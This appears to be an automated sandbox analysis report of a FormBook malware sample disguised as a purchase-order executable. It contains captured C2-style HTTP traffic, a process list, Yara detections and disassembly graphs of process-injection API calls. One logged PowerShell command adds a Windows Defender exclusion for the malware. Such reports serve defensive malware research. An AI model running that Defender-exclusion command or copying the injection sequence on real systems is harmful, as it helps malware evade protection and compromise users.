                                                                                        Data Ascii: Sb=bxZWh/FHVvJvbcitzbJyHFTZFmr9dqjrqu1C2Fq9BI16vBaRg1UCX/btLjBF2EJDFTETCCXMCw1JI75kfb4e/nhtyCC0uM6ZQQk45BdtAgQsy/F6JA59FKhr8NeCJ0INfuYlqMM7eNfB31bIBJ8EORVjcxdQ+mX3ipLm28lJZ20YP2J2ylG2s0cScZqzOH8gw3Ee6VV0s4rML5/N7JT8hXYTNOO/2BH8Eeudei0ZLd0YzJ28XqKgeX1/ml2P1v7FwcNvINBi1X7aWMCHepBGlw/KgKoQ8yibwDzFtgRlO489HGMXWMNZP/Vr732mQ8iXvUk6SqgJuCkTkrmKeD2hTjyMaA39+l5XKTRpX0xcxCa3NgkKKOwWXyzIDNM0HFyEMggKrZrUSYXl2WVzlofYyBYTnRsigbmAWQ25/Mc/ykYorQjWkNqj2nJujzZM6EzpkLAAC7p57OkreK/E67B8Tbdf5CjjJW1QipOcPr8SXhVyuLnCVnCKLauGfJ2SFBdKqPOipOulgnF2r86f8tfx1uEaPxoeVo4EIcfeRbi59re+tgUIP+bvZgeZTAKaFPoP5N4G0DRhTrFVWsmnMcp99linYFvhCHq97SYMKhWyEzx9Z50JIwosXu4S67sHEYYy4m5LFMC9ujOTh2eS3Sm9xsUORPrX+LBt9qVyHrQ+sLvYxPWqqXzVKKyS7upp02bZrtUGwrtnd77kqOroXoGc2XCuUQBNQb6IkVGXhkB+0+BDI6OtiBE9QYx1aw4r/985SrZpFB4LD6IzxCfaDZIgQjuSj3OwQst5NSIxN7L5/7ajErJvmvzfGcpKHEzr5HsSj3cK3Pw2QTKdZih6C087/O7
                                                                                        Dec 12, 2024 21:59:36.471029043 CET6509OUTData Raw: 50 59 65 77 55 49 48 65 33 61 4b 31 78 2f 69 45 7a 63 49 78 6a 39 69 46 6d 2b 32 4a 65 6c 69 55 35 47 6e 41 57 59 44 6e 2b 6c 53 6f 7a 5a 4b 62 44 4b 4e 2f 41 4c 6c 63 35 68 6b 44 77 6f 47 57 6e 63 53 44 75 61 4e 59 6d 50 77 6c 58 61 35 72 2f 37
                                                                                        Data Ascii: PYewUIHe3aK1x/iEzcIxj9iFm+2JeliU5GnAWYDn+lSozZKbDKN/ALlc5hkDwoGWncSDuaNYmPwlXa5r/7udqkgjWf2stLO8fI1I7LMLb0VxPwOV0hDvjQyL+WVLpx0A9Ux8Kl67XLD6sd/mezKGTrq1TdY4Jt/I4WzigFNbCg+yK7jf3j6hAd4ThrfoGipDCz4hbWUa/w8UuqDLWs1xDGNwpAHdm4LARaZHpEMZd6sLOmwVgLU
                                                                                        Dec 12, 2024 21:59:36.602243900 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:36 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 0a8be6d0-3b60-405e-a564-882926802967
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=0a8be6d0-3b60-405e-a564-882926802967; expires=Thu, 12 Dec 2024 21:14:36 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 73 4a 67 31 54 45 31 41 79 51 58 6f 55 30 4b 45 64 50 62 56 37 46 53 51 33 49 37 62 72 38 58 58 53 37 68 71 52 44 74 42 50 46 69 57 42 4f 68 32 55 71 7a 39 30 65 59 71 76 34 33 46 7a 2f 64 4e 36 48 30 41 67 74 32 41 34 45 6e 47 37 69 6b 52 2f 4f 4f 48 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:59:36.602252007 CET498INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGE4YmU2ZDAtM2I2MC00MDVlLWE1NjQtODgyOTI2ODAyOTY3IiwicGFnZV90aW1lIjoxNzM0MDM3MTc2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        85192.168.11.2049800199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:59:39.123608112 CET377OUTGET /tp8k/?Hsa=KVXAK1dJ22EyzD&Sb=Wzx2iIlwW+94es3u4Lo0FS74KiXnatT9p9we6G2JYq0Bn2uTvRtkednmI39Cm2I2dBYZfF7KG0N4DZZkU64bjEcb6QrTm/GIaTVemQQoPiAr/pRWHyNTKL8= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:59:39.254616976 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:38 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1450
                                                                                        x-request-id: 0f0e87ad-3e35-4e5e-9e73-6768b65a0568
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yveCLs2WyVfzFDf1GOwUFtqq/OwBkJNvB35PkBrb6MkhKrTK5N0OZqAue9eGyMW9JZ8Y5rM5O/xMgvJ0N0t3dw==
                                                                                        set-cookie: parking_session=0f0e87ad-3e35-4e5e-9e73-6768b65a0568; expires=Thu, 12 Dec 2024 21:14:39 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 76 65 43 4c 73 32 57 79 56 66 7a 46 44 66 31 47 4f 77 55 46 74 71 71 2f 4f 77 42 6b 4a 4e 76 42 33 35 50 6b 42 72 62 36 4d 6b 68 4b 72 54 4b 35 4e 30 4f 5a 71 41 75 65 39 65 47 79 4d 57 39 4a 5a 38 59 35 72 4d 35 4f 2f 78 4d 67 76 4a 30 4e 30 74 33 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yveCLs2WyVfzFDf1GOwUFtqq/OwBkJNvB35PkBrb6MkhKrTK5N0OZqAue9eGyMW9JZ8Y5rM5O/xMgvJ0N0t3dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:59:39.254637957 CET850INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGYwZTg3YWQtM2UzNS00ZTVlLTllNzMtNjc2OGI2NWEwNTY4IiwicGFnZV90aW1lIjoxNzM0MDM3MTc5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLz9


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:15:52:47
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Users\user\Desktop\PO 1202495088.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PO 1202495088.exe"
                                                                                        Imagebase:0xd20000
                                                                                        File size:863'232 bytes
                                                                                        MD5 hash:49095D080A201256F23914317E65EF4B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:15:53:02
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"
                                                                                        Imagebase:0xf00000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:15:53:02
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6c18e0000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:15:53:02
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Users\user\Desktop\PO 1202495088.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PO 1202495088.exe"
                                                                                        Imagebase:0x960000
                                                                                        File size:863'232 bytes
                                                                                        MD5 hash:49095D080A201256F23914317E65EF4B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:15:53:11
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7f78b0000
                                                                                        File size:57'360 bytes
                                                                                        MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:15:53:30
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                        Imagebase:0x140000000
                                                                                        File size:16'696'840 bytes
                                                                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:15:53:31
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cttune.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\cttune.exe"
                                                                                        Imagebase:0xdd0000
                                                                                        File size:72'192 bytes
                                                                                        MD5 hash:E515AF722F75E1A5708B532FAA483333
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:15:53:56
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff6038f0000
                                                                                        File size:597'432 bytes
                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:18.6%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:4.2%
                                                                                          Total number of Nodes:165
                                                                                          Total number of Limit Nodes:7
                                                                                          execution_graph 10854 75f839d 10855 75f83a3 10854->10855 10861 75f916a 10855->10861 10879 75f9120 10855->10879 10897 75f9170 10855->10897 10915 75f9112 10855->10915 10856 75f83c5 10862 75f9170 10861->10862 10865 75f91ae 10862->10865 10933 75f9938 10862->10933 10938 75f99c2 10862->10938 10942 75f9506 10862->10942 10947 75f9747 10862->10947 10952 75f982a 10862->10952 10956 75f986a 10862->10956 10960 75f98ac 10862->10960 10965 75f96cc 10862->10965 10972 75f9dad 10862->10972 10977 75f9a4d 10862->10977 10987 75f99ae 10862->10987 10993 75f9734 10862->10993 10998 75f9694 10862->10998 11002 75f95f5 10862->11002 11007 75f9eb8 10862->11007 10865->10856 10880 75f912c 10879->10880 10880->10856 10881 75f91ae 10880->10881 10882 75f9938 2 API calls 10880->10882 10883 75f9eb8 2 API calls 10880->10883 10884 75f95f5 2 API calls 10880->10884 10885 75f9694 2 API calls 10880->10885 10886 75f9734 2 API calls 10880->10886 10887 75f99ae 2 API calls 10880->10887 10888 75f9a4d 4 API calls 10880->10888 10889 75f9dad 2 API calls 10880->10889 10890 75f96cc 4 API calls 10880->10890 10891 75f98ac 2 API calls 10880->10891 10892 75f986a 2 API calls 10880->10892 10893 75f982a 2 API calls 10880->10893 10894 75f9747 2 API calls 10880->10894 10895 75f9506 2 API calls 10880->10895 10896 75f99c2 2 API calls 10880->10896 10881->10856 10882->10881 10883->10881 10884->10881 10885->10881 10886->10881 10887->10881 10888->10881 10889->10881 10890->10881 10891->10881 10892->10881 10893->10881 10894->10881 10895->10881 10896->10881 10898 75f918a 10897->10898 10899 75f91ae 10898->10899 10900 75f9938 2 API calls 10898->10900 10901 75f9eb8 2 API calls 10898->10901 10902 75f95f5 2 API calls 10898->10902 10903 75f9694 2 API calls 10898->10903 10904 75f9734 2 API calls 10898->10904 10905 75f99ae 2 API calls 10898->10905 10906 75f9a4d 4 API calls 10898->10906 10907 75f9dad 2 API calls 10898->10907 10908 75f96cc 4 API calls 10898->10908 10909 75f98ac 2 API calls 10898->10909 10910 75f986a 2 API calls 10898->10910 10911 75f982a 2 API calls 10898->10911 10912 75f9747 2 API calls 10898->10912 10913 75f9506 2 API calls 10898->10913 10914 75f99c2 2 API calls 10898->10914 10899->10856 10900->10899 10901->10899 10902->10899 10903->10899 10904->10899 10905->10899 10906->10899 10907->10899 10908->10899 10909->10899 10910->10899 10911->10899 10912->10899 10913->10899 10914->10899 10916 75f911b 10915->10916 10916->10856 10917 75f9938 2 API calls 10916->10917 10918 75f9eb8 2 API calls 10916->10918 10919 75f91ae 10916->10919 10920 75f95f5 2 API calls 10916->10920 10921 75f9694 2 API calls 10916->10921 10922 75f9734 2 API calls 10916->10922 10923 75f99ae 2 API calls 10916->10923 10924 75f9a4d 4 API calls 10916->10924 10925 75f9dad 2 API calls 10916->10925 10926 75f96cc 4 API calls 10916->10926 10927 75f98ac 2 API calls 10916->10927 10928 75f986a 2 API calls 10916->10928 10929 75f982a 2 API calls 10916->10929 10930 75f9747 2 API calls 10916->10930 10931 75f9506 2 API calls 10916->10931 10932 75f99c2 2 API calls 10916->10932 10917->10919 10918->10919 10919->10856 10920->10919 10921->10919 10922->10919 10923->10919 10924->10919 10925->10919 10926->10919 10927->10919 10928->10919 10929->10919 10930->10919 10931->10919 10932->10919 10934 75f95eb 10933->10934 10935 75f95fd 10934->10935 11011 75f78d9 10934->11011 11015 75f78e0 10934->11015 10935->10865 10940 75f78d9 WriteProcessMemory 10938->10940 10941 75f78e0 WriteProcessMemory 10938->10941 10939 75f99f0 10939->10865 10940->10939 10941->10939 10943 75f952d 10942->10943 11019 75f7c78 10943->11019 11023 75f7c76 10943->11023 10948 75f95eb 10947->10948 10948->10947 10949 75f95fd 10948->10949 10950 75f78d9 WriteProcessMemory 10948->10950 10951 75f78e0 WriteProcessMemory 10948->10951 10949->10865 10950->10948 10951->10948 11027 75f724a 10952->11027 11031 75f7250 10952->11031 10953 75f984b 10953->10865 11035 75f7a38 10956->11035 11039 75f7a40 10956->11039 10957 75f9671 10957->10865 10961 75f9830 10960->10961 10962 75f984b 10960->10962 10961->10962 10963 75f724a Wow64SetThreadContext 10961->10963 10964 75f7250 Wow64SetThreadContext 10961->10964 10962->10865 10963->10962 10964->10962 10968 75f724a Wow64SetThreadContext 10965->10968 10969 75f7250 Wow64SetThreadContext 10965->10969 10966 75f95eb 10967 75f95fd 10966->10967 10970 75f78d9 WriteProcessMemory 10966->10970 10971 75f78e0 WriteProcessMemory 10966->10971 10967->10865 10968->10966 10969->10966 10970->10966 10971->10966 10973 75f9db3 10972->10973 11043 75f7160 10973->11043 11047 75f6edd 10973->11047 10974 75f9f92 10978 75f9dc4 10977->10978 10979 75f9a5a 10977->10979 10983 75f6edd ResumeThread 10978->10983 10984 75f7160 ResumeThread 10978->10984 10979->10978 10981 75f95eb 10979->10981 10980 75f9f92 10982 75f95fd 10981->10982 10985 75f78d9 WriteProcessMemory 10981->10985 10986 75f78e0 WriteProcessMemory 10981->10986 10982->10865 10983->10980 10984->10980 10985->10981 10986->10981 10988 75f99bb 10987->10988 10989 75f95eb 10987->10989 10990 75f95fd 10989->10990 10991 75f78d9 WriteProcessMemory 10989->10991 10992 75f78e0 WriteProcessMemory 10989->10992 10990->10865 10991->10989 10992->10989 10994 75f9741 10993->10994 10996 75f6edd ResumeThread 10994->10996 10997 75f7160 ResumeThread 10994->10997 10995 75f9f92 10996->10995 10997->10995 11051 75f77b8 10998->11051 11055 75f77b0 10998->11055 10999 75f96b6 10999->10865 11003 75f95eb 11002->11003 11004 75f95fd 11003->11004 11005 75f78d9 WriteProcessMemory 11003->11005 11006 75f78e0 WriteProcessMemory 11003->11006 11004->10865 11005->11003 11006->11003 11008 75f9f23 11007->11008 11009 75f78d9 WriteProcessMemory 11008->11009 11010 75f78e0 WriteProcessMemory 11008->11010 11009->11008 11010->11008 11012 75f78e0 WriteProcessMemory 11011->11012 11014 75f79cb 11012->11014 11014->10934 11016 75f792c WriteProcessMemory 11015->11016 11018 75f79cb 11016->11018 11018->10934 11020 75f7cff CreateProcessA 11019->11020 11022 75f7f5d 11020->11022 11022->11022 11024 75f7c78 CreateProcessA 11023->11024 11026 75f7f5d 11024->11026 11026->11026 11028 75f7250 Wow64SetThreadContext 11027->11028 11030 75f7317 11028->11030 11030->10953 11032 75f7299 Wow64SetThreadContext 11031->11032 11034 75f7317 11032->11034 11034->10953 11036 75f7a40 ReadProcessMemory 11035->11036 11038 75f7b0a 11036->11038 11038->10957 11040 75f7a8c ReadProcessMemory 11039->11040 11042 75f7b0a 11040->11042 11042->10957 11044 75f71a4 ResumeThread 11043->11044 11046 75f71f6 11044->11046 11046->10974 11048 75f7160 ResumeThread 11047->11048 11050 75f71f6 11048->11050 11050->10974 11052 75f77fc VirtualAllocEx 11051->11052 11054 75f787a 11052->11054 11054->10999 11056 75f7775 11055->11056 11056->11055 11057 75f7835 VirtualAllocEx 11056->11057 11058 75f787a 11057->11058 11058->10999 11059 30eae00 11060 30eae4d VirtualProtect 11059->11060 11061 30eaebf 11060->11061

                                                                                          Executed Functions

                                                                                          Function 030E3D60 Relevance: 4.0, Strings: 3, Instructions: 277COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 30e3d60-30e3df2 1 30e3df9-30e3dfa 0->1 2 30e3df4-30e3df8 0->2 3 30e3dfc-30e3dff 1->3 4 30e3e01-30e3e23 1->4 2->1 3->4 5 30e3e2a-30e3e84 call 30e0bb8 4->5 6 30e3e25 4->6 10 30e3e87 5->10 6->5 11 30e3e8e-30e3eaa 10->11 12 30e3eac 11->12 13 30e3eb3-30e3eb4 11->13 12->10 12->13 14 30e3f4c-30e3f76 12->14 15 30e4003-30e401e 12->15 16 30e3ee3-30e3ef5 12->16 17 30e4023-30e403a 12->17 18 30e4060-30e40d0 call 30e0c34 12->18 19 30e403f-30e405b 12->19 20 30e3f1c-30e3f20 12->20 21 30e3f7b-30e3fb1 12->21 22 30e3eb9-30e3ee1 12->22 23 30e3fb6-30e3fcb 12->23 24 30e3ef7-30e3eff call 30e46b0 12->24 25 30e3fd0-30e3ffe 12->25 13->18 14->11 15->11 16->11 17->11 42 30e40d2 call 30e53bb 18->42 43 30e40d2 call 30e50e8 18->43 44 30e40d2 call 30e5d58 18->44 45 30e40d2 call 30e59d6 18->45 46 30e40d2 call 30e5da7 18->46 19->11 26 30e3f22-30e3f31 20->26 27 30e3f33-30e3f3a 20->27 21->11 22->11 23->11 30 30e3f05-30e3f17 24->30 25->11 31 30e3f41-30e3f47 26->31 27->31 30->11 31->11 41 30e40d8-30e40e2 42->41 43->41 44->41 45->41 46->41
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Tegq$Tegq$z^I
                                                                                          • API String ID: 0-723423495
                                                                                          • Opcode ID: f571d2ad4a76712ccc08eee2a705a631009324f122c7c5563cde26b6c1b16dd5
                                                                                          • Instruction ID: 0d8c93a460cebac6d5f4709fee84146860304d8bc105b51b861f69aaa5b1278a
                                                                                          • Opcode Fuzzy Hash: f571d2ad4a76712ccc08eee2a705a631009324f122c7c5563cde26b6c1b16dd5
                                                                                          • Instruction Fuzzy Hash: 59C11775E012098FCB08DFAAC980ADDFBB2FF89300F28956AD415AB354D735AA55CF50
                                                                                          Function 030E3E00 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 48 30e3e00-30e3e23 50 30e3e2a-30e3e84 call 30e0bb8 48->50 51 30e3e25 48->51 55 30e3e87 50->55 51->50 56 30e3e8e-30e3eaa 55->56 57 30e3eac 56->57 58 30e3eb3-30e3eb4 56->58 57->55 57->58 59 30e3f4c-30e3f76 57->59 60 30e4003-30e401e 57->60 61 30e3ee3-30e3ef5 57->61 62 30e4023-30e403a 57->62 63 30e4060-30e40d0 call 30e0c34 57->63 64 30e403f-30e405b 57->64 65 30e3f1c-30e3f20 57->65 66 30e3f7b-30e3fb1 57->66 67 30e3eb9-30e3ee1 57->67 68 30e3fb6-30e3fcb 57->68 69 30e3ef7-30e3eff call 30e46b0 57->69 70 30e3fd0-30e3ffe 57->70 58->63 59->56 60->56 61->56 62->56 88 30e40d2 call 30e53bb 63->88 89 30e40d2 call 30e50e8 63->89 90 30e40d2 call 30e5d58 63->90 91 30e40d2 call 30e59d6 63->91 92 30e40d2 call 30e5da7 63->92 64->56 71 30e3f22-30e3f31 65->71 72 30e3f33-30e3f3a 65->72 66->56 67->56 68->56 75 30e3f05-30e3f17 69->75 70->56 76 30e3f41-30e3f47 71->76 72->76 75->56 76->56 86 30e40d8-30e40e2 88->86 89->86 90->86 91->86 92->86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
